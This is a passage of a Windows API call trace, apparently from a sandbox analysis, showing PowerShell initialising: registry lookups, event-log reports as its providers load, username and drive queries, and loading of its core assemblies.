	[0351.732] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x378) returned 0x0
	[0351.732] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
	[0351.732] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x37c) returned 0x0
	[0351.732] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
	[0351.732] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x380) returned 0x0
	[0351.732] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
	[0351.732] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x384) returned 0x0
	[0351.732] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
	[0351.733] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x388) returned 0x0
	[0351.733] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
	[0351.733] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x38c) returned 0x0
	[0351.733] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x390) returned 0x0
	[0351.733] RegCloseKey (hKey=0x390) returned 0x0
	[0351.733] RegCloseKey (hKey=0x36c) returned 0x0
	[0351.733] RegCloseKey (hKey=0x38c) returned 0x0
	[0351.736] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8e0008
	[0351.959] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d3c7d8*="WSMan", lpRawData=0x2d3c548) returned 1
	[0351.965] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0351.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.965] CoTaskMemFree (pv=0x34eb50) 
	[0351.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.967] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0351.967] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0351.967] CoTaskMemFree (pv=0x2f0650) 
	[0351.967] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.967] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0351.968] CoTaskMemFree (pv=0x309530) 
	[0351.968] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d421b8*="Alias", lpRawData=0x2d41f48) returned 1
	[0351.972] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0351.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.972] CoTaskMemFree (pv=0x34eb50) 
	[0351.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.974] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0351.974] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0351.974] CoTaskMemFree (pv=0x2f0650) 
	[0351.974] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.974] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0351.974] CoTaskMemFree (pv=0x309530) 
	[0351.974] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d477b0*="Environment", lpRawData=0x2d47540) returned 1
	[0351.985] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0351.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.985] CoTaskMemFree (pv=0x34eb50) 
	[0351.985] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0351.985] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0351.986] CoTaskMemFree (pv=0x34eb50) 
	[0351.986] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0351.986] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0351.986] CoTaskMemFree (pv=0x34eb50) 
	[0351.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0351.986] SetErrorMode (uMode=0x1) returned 0x1
	[0351.986] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.986] SetErrorMode (uMode=0x1) returned 0x1
	[0351.988] GetLogicalDrives () returned 0x4
	[0351.988] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.989] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.989] SetErrorMode (uMode=0x1) returned 0x1
	[0351.990] CoTaskMemAlloc (cb=0x68) returned 0x37e170
	[0351.990] CoTaskMemAlloc (cb=0x68) returned 0x37dd80
	[0351.990] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x37e170, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd290, lpMaximumComponentLength=0xcd28c, lpFileSystemFlags=0xcd288, lpFileSystemNameBuffer=0x37dd80, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd290*=0x9c354b42, lpMaximumComponentLength=0xcd28c*=0xff, lpFileSystemFlags=0xcd288*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0351.990] CoTaskMemFree (pv=0x37e170) 
	[0351.991] CoTaskMemFree (pv=0x37dd80) 
	[0351.991] SetErrorMode (uMode=0x1) returned 0x1
	[0351.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.991] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.991] SetErrorMode (uMode=0x1) returned 0x1
	[0351.991] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd230 | out: lpFileInformation=0xcd230*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.991] SetErrorMode (uMode=0x1) returned 0x1
	[0351.991] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.991] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.992] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.992] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.992] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.992] SetErrorMode (uMode=0x1) returned 0x1
	[0351.992] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.992] SetErrorMode (uMode=0x1) returned 0x1
	[0351.992] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.992] SetErrorMode (uMode=0x1) returned 0x1
	[0351.992] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.993] SetErrorMode (uMode=0x1) returned 0x1
	[0351.993] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.993] SetErrorMode (uMode=0x1) returned 0x1
	[0351.993] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd100 | out: lpFileInformation=0xcd100*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.993] SetErrorMode (uMode=0x1) returned 0x1
	[0351.993] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0351.993] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0351.994] CoTaskMemFree (pv=0x2f0650) 
	[0351.994] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.994] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0351.994] CoTaskMemFree (pv=0x309530) 
	[0351.994] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d4e8a0*="FileSystem", lpRawData=0x2d4e630) returned 1
	[0351.998] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0351.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.998] CoTaskMemFree (pv=0x34eb50) 
	[0351.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.999] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0352.000] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0352.000] CoTaskMemFree (pv=0x2f0650) 
	[0352.000] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0352.000] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0352.000] CoTaskMemFree (pv=0x309530) 
	[0352.000] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d540e0*="Function", lpRawData=0x2d53e70) returned 1
	[0352.018] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0352.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.018] CoTaskMemFree (pv=0x34eb50) 
	[0352.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.573] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0352.573] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0352.573] CoTaskMemFree (pv=0x2f0650) 
	[0352.573] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0352.573] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0352.573] CoTaskMemFree (pv=0x309530) 
	[0352.573] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d86370*="Registry", lpRawData=0x2d86100) returned 1
	[0352.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.990] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0352.990] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0352.990] CoTaskMemFree (pv=0x2f0650) 
	[0352.990] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0352.990] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0352.991] CoTaskMemFree (pv=0x309530) 
	[0352.991] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d8b788*="Variable", lpRawData=0x2d8b518) returned 1
	[0353.031] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.031] CoTaskMemFree (pv=0x34eb50) 
	[0353.031] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.031] CoTaskMemFree (pv=0x34eb50) 
	[0353.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0353.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0353.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0353.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0353.276] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0353.276] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0353.277] CoTaskMemFree (pv=0x2f0650) 
	[0353.277] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0353.277] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0353.277] CoTaskMemFree (pv=0x309530) 
	[0353.277] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d9f3a0*="Certificate", lpRawData=0x2d9f130) returned 1
	[0353.365] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.365] CoTaskMemFree (pv=0x34eb50) 
	[0353.369] GetLogicalDrives () returned 0x4
	[0353.369] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.369] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0353.370] CoTaskMemAlloc (cb=0x20e) returned 0x2b57a0
	[0353.370] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2b57a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0353.370] CoTaskMemFree (pv=0x2b57a0) 
	[0353.372] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
